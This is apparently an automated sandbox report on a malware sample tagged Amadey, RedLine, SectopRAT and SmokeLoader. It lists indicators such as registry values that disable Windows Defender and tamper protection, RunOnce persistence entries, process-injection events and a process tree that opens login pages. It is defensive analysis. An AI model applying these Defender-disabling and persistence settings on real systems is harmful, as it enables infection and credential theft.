amadey | 9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	2FF8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	2FF8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	2FF8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	2FF8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	2FF8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	2FF8.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/memory/4792-46-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/files/0x00060000000230f0-351.dat	family_redline
behavioral1/files/0x00060000000230f0-352.dat	family_redline
behavioral1/memory/5420-353-0x0000000000CE0000-0x0000000000D1E000-memory.dmp	family_redline
behavioral1/memory/5712-564-0x00000000020A0000-0x00000000020FA000-memory.dmp	family_redline
behavioral1/memory/1636-572-0x00000000009F0000-0x0000000000A0E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/1636-572-0x00000000009F0000-0x0000000000A0E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
1392	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	5Db9Vx6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	2C8B.bat
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	327A.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	8510.exe

Executes dropped EXE 31 IoCs

pid	Process
2104	ha2qw14.exe
180	jD8on67.exe
856	Ye6Dg25.exe
4460	1ou78gA4.exe
1188	2Hs4415.exe
1064	3ij55PW.exe
4788	4nq123zt.exe
1676	5Db9Vx6.exe
5412	2AC4.exe
5436	2BDE.exe
5496	VH1ag4IK.exe
5548	2C8B.bat
5560	WY0Fl3xP.exe
5636	FC8mB1bm.exe
5700	2E71.exe
5724	dB9lZ4Iu.exe
5780	1jV90Hm9.exe
5812	2FF8.exe
5992	327A.exe
2276	explothe.exe
5420	2nZ180YP.exe
5824	explothe.exe
2288	8510.exe
5296	toolspub2.exe
5300	31839b57a4f11171d6abc8bbc4451ee4.exe
5712	984A.exe
5536	source1.exe
1860	toolspub2.exe
644	9BB6.exe
4132	latestX.exe
1636	9EA5.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	2FF8.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	WY0Fl3xP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	dB9lZ4Iu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	jD8on67.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	VH1ag4IK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	FC8mB1bm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	ha2qw14.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Ye6Dg25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	2AC4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 4460 set thread context of 3124	4460	1ou78gA4.exe	95
PID 1188 set thread context of 1720	1188	2Hs4415.exe	99
PID 1064 set thread context of 2748	1064	3ij55PW.exe	105
PID 4788 set thread context of 4792	4788	4nq123zt.exe	111
PID 5436 set thread context of 5836	5436	2BDE.exe	158
PID 5700 set thread context of 6040	5700	2E71.exe	162
PID 5780 set thread context of 6056	5780	1jV90Hm9.exe	163
PID 5296 set thread context of 1860	5296	toolspub2.exe	198

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
624	sc.exe
5812	sc.exe
4712	sc.exe
5132	sc.exe
5704	sc.exe
5672	sc.exe
5216	sc.exe
4128	sc.exe
5372	sc.exe
5988	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
4672	4460	WerFault.exe	93
800	1188	WerFault.exe	98
1316	1720	WerFault.exe	99
2276	1064	WerFault.exe	104
3764	4788	WerFault.exe	110
5948	5436	WerFault.exe	147
4260	5780	WerFault.exe	154
4324	5700	WerFault.exe	152
2580	6056	WerFault.exe	163

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4240	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3124	AppLaunch.exe
3124	AppLaunch.exe
2748	AppLaunch.exe
2748	AppLaunch.exe
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found
2624	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2748	AppLaunch.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeDebugPrivilege	3124	AppLaunch.exe
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeDebugPrivilege	5812	2FF8.exe
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeDebugPrivilege	5536	source1.exe
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found
Token: SeShutdownPrivilege	2624	Process not Found
Token: SeCreatePagefilePrivilege	2624	Process not Found

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe
1092	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3592 wrote to memory of 2104	3592	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe	89
PID 3592 wrote to memory of 2104	3592	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe	89
PID 3592 wrote to memory of 2104	3592	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe	89
PID 2104 wrote to memory of 180	2104	ha2qw14.exe	90
PID 2104 wrote to memory of 180	2104	ha2qw14.exe	90
PID 2104 wrote to memory of 180	2104	ha2qw14.exe	90
PID 180 wrote to memory of 856	180	jD8on67.exe	92
PID 180 wrote to memory of 856	180	jD8on67.exe	92
PID 180 wrote to memory of 856	180	jD8on67.exe	92
PID 856 wrote to memory of 4460	856	Ye6Dg25.exe	93
PID 856 wrote to memory of 4460	856	Ye6Dg25.exe	93
PID 856 wrote to memory of 4460	856	Ye6Dg25.exe	93
PID 4460 wrote to memory of 3192	4460	1ou78gA4.exe	94
PID 4460 wrote to memory of 3192	4460	1ou78gA4.exe	94
PID 4460 wrote to memory of 3192	4460	1ou78gA4.exe	94
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 4460 wrote to memory of 3124	4460	1ou78gA4.exe	95
PID 856 wrote to memory of 1188	856	Ye6Dg25.exe	98
PID 856 wrote to memory of 1188	856	Ye6Dg25.exe	98
PID 856 wrote to memory of 1188	856	Ye6Dg25.exe	98
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 1188 wrote to memory of 1720	1188	2Hs4415.exe	99
PID 180 wrote to memory of 1064	180	jD8on67.exe	104
PID 180 wrote to memory of 1064	180	jD8on67.exe	104
PID 180 wrote to memory of 1064	180	jD8on67.exe	104
PID 1064 wrote to memory of 2748	1064	3ij55PW.exe	105
PID 1064 wrote to memory of 2748	1064	3ij55PW.exe	105
PID 1064 wrote to memory of 2748	1064	3ij55PW.exe	105
PID 1064 wrote to memory of 2748	1064	3ij55PW.exe	105
PID 1064 wrote to memory of 2748	1064	3ij55PW.exe	105
PID 1064 wrote to memory of 2748	1064	3ij55PW.exe	105
PID 2104 wrote to memory of 4788	2104	ha2qw14.exe	110
PID 2104 wrote to memory of 4788	2104	ha2qw14.exe	110
PID 2104 wrote to memory of 4788	2104	ha2qw14.exe	110
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 4788 wrote to memory of 4792	4788	4nq123zt.exe	111
PID 3592 wrote to memory of 1676	3592	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe	115
PID 3592 wrote to memory of 1676	3592	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe	115
PID 3592 wrote to memory of 1676	3592	9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe	115
PID 1676 wrote to memory of 4832	1676	5Db9Vx6.exe	117
PID 1676 wrote to memory of 4832	1676	5Db9Vx6.exe	117
PID 4832 wrote to memory of 3672	4832	cmd.exe	120
PID 4832 wrote to memory of 3672	4832	cmd.exe	120
PID 4832 wrote to memory of 1092	4832	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe
"C:\Users\Admin\AppData\Local\Temp\9e5cfe3d1311bc16099afe7716b48d76b0982b76b769df2a6f78ffdeafd81c34.exe"
1⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ha2qw14.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ha2qw14.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jD8on67.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jD8on67.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:180
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ye6Dg25.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ye6Dg25.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:856
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ou78gA4.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ou78gA4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4460
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:3192
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3124
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 196
        6⤵
        Program crash
        
        PID:4672
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Hs4415.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Hs4415.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1188
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 184
        7⤵
        Program crash
        
        PID:1316
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 572
        6⤵
        Program crash
        
        PID:800
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3ij55PW.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3ij55PW.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1064
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2748
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 572
        5⤵
        Program crash
        
        PID:2276
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4nq123zt.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4nq123zt.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 572
      4⤵
      Program crash
      PID:3764
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Db9Vx6.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Db9Vx6.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D3AB.tmp\D3AC.tmp\D3AD.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Db9Vx6.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:3672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa25eb46f8,0x7ffa25eb4708,0x7ffa25eb4718
        5⤵
        
        PID:3120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,14528326103846552087,11775043880472345935,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
        5⤵
        
        PID:2568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,14528326103846552087,11775043880472345935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
        5⤵
        
        PID:4996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa25eb46f8,0x7ffa25eb4708,0x7ffa25eb4718
        5⤵
        
        PID:4320
